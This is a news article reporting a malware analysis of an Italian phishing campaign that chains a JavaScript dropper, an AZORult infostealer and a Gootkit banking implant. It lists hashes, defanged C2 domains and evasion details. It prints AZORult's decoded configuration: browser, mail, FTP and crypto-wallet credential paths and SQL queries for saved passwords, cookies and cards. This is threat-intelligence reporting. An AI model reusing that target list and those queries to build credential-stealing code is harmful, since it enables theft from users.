• Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
MUST READ

Critical Sudo bugs expose major Linux distros to local Root exploits

 | 

Google fined $314M for misusing idle Android users' data

 | 

A flaw in Catwatchful spyware exposed logins of +62,000 users

 | 

China-linked group Houken hit French organizations using zero-days

 | 

Cybercriminals Target Brazil: 248,725 Exposed in CIEE One Data Breach

 | 

Europol shuts down Archetyp Market, longest-running dark web drug marketplace

 | 

Kelly Benefits data breach has impacted 550,000 people, and the situation continues to worsen as the investigation progresses

 | 

Cisco removed the backdoor account from its Unified Communications Manager

 | 

U.S. Sanctions Russia's Aeza Group for aiding crooks with bulletproof hosting

 | 

Qantas confirms customer data breach amid Scattered Spider attacks

 | 

CVE-2025-6554 is the fourth Chrome zero-day patched by Google in 2025

 | 

U.S. CISA adds TeleMessage TM SGNL flaws to its Known Exploited Vulnerabilities catalog

 | 

A sophisticated cyberattack hit the International Criminal Court

 | 

Esse Health data breach impacted 263,000 individuals

 | 

Europol dismantles €460M crypto scam targeting 5,000 victims worldwide

 | 

CISA and U.S. Agencies warn of ongoing Iranian cyber threats to critical infrastructure

 | 

U.S. CISA adds Citrix NetScaler flaw to its Known Exploited Vulnerabilities catalog

 | 

Canada bans Hikvision over national security concerns

 | 

Denmark moves to protect personal identity from deepfakes with new copyright law

 | 

Ahold Delhaize data breach affected over 2.2 Million individuals

 | 
  • Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
  • Home
  • Breaking News
  • Hacking
  • Malware
  • Gootkit: Unveiling the Hidden Link with AZORult

Gootkit: Unveiling the Hidden Link with AZORult

Pierluigi Paganini February 12, 2019

Cybaze-Yoroi ZLAB revealed interesting a hidden connection between the AZORult toolkit and specific Gootkit payload.

Introduction

In the last days, a huge attack campaign hit several organizations across the Italian cyberspace, as stated on bulletin N020219 the attack waves tried to impersonate legit communication from a known Express Courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkitpayload.

Technical analysis

Stage 1 – The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, most of the times able to avoid antivirus detection during the initial stages of the attack campaigns.

Hash12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threatmalicious js
DescObfuscated malicious JS. This download first component and keep communication with C2 server.

Table 1:  Generic information about malicious js file

This JS file is an obfuscated dropper with the purpose to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld.]com and driverconnectsearch.]info. The behaviour of this sort of JavaScript stager is as essential as interesting: it downloads other executable code able to virtually do anything the attacker wants. This kind of pattern and the simplicity of the code itself remotely resemble the Brushaloader threat, a known dropper/stager written in VBScript and contacting its remote infrastructures in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionalities, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet Archive encoded within the chunk of executable javascript code returned by driverconnectsearch[.]info. Then it stores it in “%APPDATA%\Local\Temp\”.  

As shown in Figure 3,  the first characters of the encoded payload string are “TVNDRg” which translates to “MSCF”: standard header of the Microsoft Cabinet compressed file format.

Figure 4: Javascript downloaded from diverconnectsearch[.]info server.

Stage 2 – The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file: 

Hash2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
ThreatRuntimeBroker5.exe
DescFirst component downloaded by malicious js file.

Table 2:  Generic information about RuntimeBroker5.exe (AZORult)

Executing the RuntimeBroker5.exe sample, seems it behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample file actually does not perform only this downlaod. Here one of the key point of the article: it also establishes a communication channel with the AZORult C2 host “ssl.]admin.]itybuy.]it”.

The network packet exchanged with the server confirms this identification due to the known communication patterns and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat. 

As shown in the following figure, the written files in “%APPDATA%\Local\Temp\” path closely match AZORult analysis described by Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

  1. firefox.exe
  2. SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  3. SOFTWARE\Mozilla\Mozilla Firefox
  4. SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
  5. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
  6. %appdata%\Mozilla\Firefox\Profiles\
  7. MozillaFireFox
  8. CurrentVersion
  9. Install_Directory
  10. nss3.dll
  11. thunderbird.exe
  12. SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  13. SOFTWARE\Mozilla\Mozilla Thunderbird
  14. SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
  15. %appdata%\Thunderbird\Profiles\
  16. ThunderBird
  17. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  18. SELECT fieldname, value FROM moz_formhistory
  19. NSS_Init
  20. PK11_GetInternalKeySlot
  21. PK11_Authenticate
  22. PK11SDR_Decrypt
  23. NSS_Shutdown
  24. PK11_FreeSlot
  25. logins.json
  26. logins
  27. hostname
  28. timesUsed
  29. encryptedUsername
  30. encryptedPassword
  31. cookies.sqlite
  32. formhistory.sqlite
  33. %LOCALAPPDATA%\Google\Chrome\User Data\
  34. %LOCALAPPDATA%\Google\Chrome SxS\User Data\
  35. %LOCALAPPDATA%\Xpom\User Data\
  36. %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
  37. %LOCALAPPDATA%\Comodo\Dragon\User Data\
  38. %LOCALAPPDATA%\Amigo\User Data\
  39. %LOCALAPPDATA%\Orbitum\User Data\
  40. %LOCALAPPDATA%\Bromium\User Data\
  41. %LOCALAPPDATA%\Chromium\User Data\
  42. %LOCALAPPDATA%\Nichrome\User Data\
  43. %LOCALAPPDATA%\RockMelt\User Data\
  44. %LOCALAPPDATA%\360Browser\Browser\User Data\
  45. %LOCALAPPDATA%\Vivaldi\User Data\
  46. %APPDATA%\Opera Software\
  47. %LOCALAPPDATA%\Go!\User Data\
  48. %LOCALAPPDATA%\Sputnik\Sputnik\User Data\
  49. %LOCALAPPDATA%\Kometa\User Data\
  50. %LOCALAPPDATA%\uCozMedia\Uran\User Data\
  51. %LOCALAPPDATA%\QIP Surf\User Data\
  52. %LOCALAPPDATA%\Epic Privacy Browser\User Data\
  53. %APPDATA%\brave\
  54. %LOCALAPPDATA%\CocCoc\Browser\User Data\
  55. %LOCALAPPDATA%\CentBrowser\User Data\
  56. %LOCALAPPDATA%\7Star\7Star\User Data\
  57. %LOCALAPPDATA%\Elements Browser\User Data\
  58. %LOCALAPPDATA%\TorBro\Profile\
  59. %LOCALAPPDATA%\Suhba\User Data\
  60. %LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
  61. %LOCALAPPDATA%\Rafotech\Mustang\User Data\
  62. %LOCALAPPDATA%\Superbird\User Data\
  63. %LOCALAPPDATA%\Chedot\User Data\
  64. %LOCALAPPDATA%\Torch\User Data\
  65. GoogleChrome
  66. GoogleChrome64
  67. InternetMailRu
  68. YandexBrowser
  69. ComodoDragon
  70. Amigo
  71. Orbitum
  72. Bromium
  73. Chromium
  74. Nichrome
  75. RockMelt
  76. 360Browser
  77. Vivaldi
  78. Opera
  79. GoBrowser
  80. Sputnik
  81. Kometa
  82. Uran
  83. QIPSurf
  84. Epic
  85. Brave
  86. CocCoc
  87. CentBrowser
  88. 7Star
  89. ElementsBrowser
  90. TorBro
  91. Suhba
  92. SaferBrowser
  93. Mustang
  94. Superbird
  95. Chedot
  96. Torch
  97. Login Data
  98. Web Data
  99. SELECT origin_url, username_value, password_value FROM logins
  100. SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
  101. SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  102. SELECT name, value FROM autofill
  103. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
  104. %APPDATA%\Microsoft\Windows\Cookies\
  105. %APPDATA%\Microsoft\Windows\Cookies\Low\
  106. %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  107. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
  108. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
  109. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
  110. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
  111. InternetExplorer
  112. InternetExplorerLow
  113. InternetExplorerINetCache
  114. MicrosoftEdge_AC_INetCookies
  115. MicrosoftEdge_AC_001
  116. MicrosoftEdge_AC_002
  117. MicrosoftEdge_AC
  118. Software\Microsoft\Internet Explorer
  119. Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  120. Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  121. Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  122. Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  123. POP3
  124. IMAP
  125. SMTP
  126. HTTP
  127. %appdata%\Waterfox\Profiles\
  128. Waterfox
  129. %appdata%\Comodo\IceDragon\Profiles\
  130. IceDragon
  131. %appdata%\8pecxstudios\Cyberfox\Profiles\
  132. Cyberfox
  133. sqlite3_open
  134. sqlite3_close
  135. sqlite3_prepare_v2
  136. sqlite3_step
  137. sqlite3_column_text
  138. sqlite3_column_bytes
  139. sqlite3_finalize
  140. %APPDATA%\filezilla\recentservers.xml
  141. <RecentServers>
  142. </RecentServers>
  143. <Server>
  144. </Server>
  145. <Host>
  146. </Host>
  147. <Port>
  148. </Port>
  149. <User>
  150. </User>
  151. <Pass>
  152. </Pass>
  153. <Pass encoding=”base64″>
  154. FileZilla
  155. ole32.dll
  156. CLSIDFromString
  157. {4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
  158. {3CCD5499-87A8-4B10-A215-608888DD3B55}
  159. vaultcli.dll
  160. VaultOpenVault
  161. VaultEnumerateItems
  162. VaultGetItem
  163. MicrosoftEdge
  164. Browsers\AutoComplete
  165. CookieList.txt
  166. SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
  167. %appdata%\Moonchild Productions\Pale Moon\Profiles\
  168. PaleMoon
  169. %appdata%\Electrum\wallets\
  170. \Electrum
  171. %appdata%\Electrum-LTC\wallets\
  172. \Electrum-LTC
  173. %appdata%\ElectrumG\wallets\
  174. \ElectrumG
  175. %appdata%\Electrum-btcp\wallets\
  176. \Electrum-btcp
  177. %APPDATA%\Ethereum\keystore\
  178. \Ethereum
  179. %APPDATA%\Exodus\
  180. \Exodus
  181. \Exodus Eden
  182. *.json,*.seco
  183. %APPDATA%\Jaxx\Local Storage\
  184. \Jaxx\Local Storage\
  185. %APPDATA%\MultiBitHD\
  186. \MultiBitHD
  187. mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
  188. .wallet
  189. wallets\.wallet
  190. wallet.dat
  191. wallets\wallet.dat
  192. electrum.dat
  193. wallets\electrum.dat
  194. Software\monero-project\monero-core
  195. wallet_path
  196. Bitcoin\Bitcoin-Qt
  197. BitcoinGold\BitcoinGold-Qt
  198. BitCore\BitCore-Qt
  199. Litecoin\Litecoin-Qt
  200. BitcoinABC\BitcoinABC-Qt
  201. %APPDATA%\Exodus Eden\
  202. %Appdata%\Psi+\profiles\
  203. %Appdata%\Psi\profiles\
  204. <roster-cache>
  205. </roster-cache>
  206. <jid type=”QString”>
  207. <password type=”QString”>
  208. </password>

Table 3: AZORult Configuration file

The multiple references to Browser Cookies and CryptoWallets confirms the “RuntimeBroker5.exe” sample, initially hidden into the cabilet archive,  is an AZORult variant.

Stage 3 – The Payload

The other file download from hairpd[.]com by AZORult’s sample is another executable PE32.

Figure 8: GET request to download the payload.
Hasha75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threatsputik.exe
Descrizione BreveSecond component downloaded by malware. This component is alive after the infection.

Table 4:  Generic information about sputik.exe (Gootkit)

The “sputik.exe” uses a set of evasion techniques to avoid the monitoring of the process, such as invoking the “UuidCreateSequential” API to detect the usage of typical virtual machine’s MAC addresses, but this technique can be easily bypassed by spoofing a real network card one.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the JavaScript code of the malware. The Gootkit implant counts several modules written on top of NodeJS technology embedded into the PE file, revealing part of the implant code.

Figure 11: Portion of Gootkit code snippet

In the past years, Gootkit source code have been leaked online and part of it is also available on the Github platform. This way we were able to investigate differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As general consideration, we noticed a lot of similarities between the codes, they are perfectly compatible, but few differences holds. For instance private keys and certificates have been modified, showing the malware author choose a stronger key.

Table 5:  Certificate comparison 
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting italian organization and users revealed interesting connections between two threats we was used to monitor and detect across both the InfoSec community and the CERT-Yoroi’s constituency, revealing a hidden link connecting this particular AZORult instance and with the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used in the initial stages of the attacks by cyber-criminals, showing how the usage of extremely flexible stagers written in high level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published on the Yoroi Blog.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – AZORult, gootkit)

[adrotate banner=”5″] [adrotate banner=”13″]


facebook linkedin twitter

AZORult Hacking malware Pierluigi Paganini Security Affairs

you might also like

Pierluigi Paganini July 04, 2025
Critical Sudo bugs expose major Linux distros to local Root exploits
Read more
Pierluigi Paganini July 04, 2025
Google fined $314M for misusing idle Android users' data
Read more

leave a comment

newsletter

Subscribe to my email list and stay
up-to-date!

    recent articles

    Critical Sudo bugs expose major Linux distros to local Root exploits

    Security / July 04, 2025

    Google fined $314M for misusing idle Android users' data

    Laws and regulations / July 04, 2025

    A flaw in Catwatchful spyware exposed logins of +62,000 users

    Malware / July 04, 2025

    China-linked group Houken hit French organizations using zero-days

    APT / July 03, 2025

    Cybercriminals Target Brazil: 248,725 Exposed in CIEE One Data Breach

    Data Breach / July 03, 2025

    To contact me write an email to:

    Pierluigi Paganini :
    pierluigi.paganini@securityaffairs.co

    LEARN MORE

    QUICK LINKS

    • Home
    • Cyber Crime
    • Cyber warfare
    • APT
    • Data Breach
    • Deep Web
    • Digital ID
    • Hacking
    • Hacktivism
    • Intelligence
    • Internet of Things
    • Laws and regulations
    • Malware
    • Mobile
    • Reports
    • Security
    • Social Networks
    • Terrorism
    • ICS-SCADA
    • POLICIES
    • Contact me

    Copyright@securityaffairs 2024

    We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept All”, you consent to the use of ALL the cookies. However, you may visit "Cookie Settings" to provide a controlled consent.
    Cookie SettingsAccept All
    Manage consent

    Privacy Overview

    This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities...
    Necessary
    Always Enabled
    Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
    Non-necessary
    Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
    SAVE & ACCEPT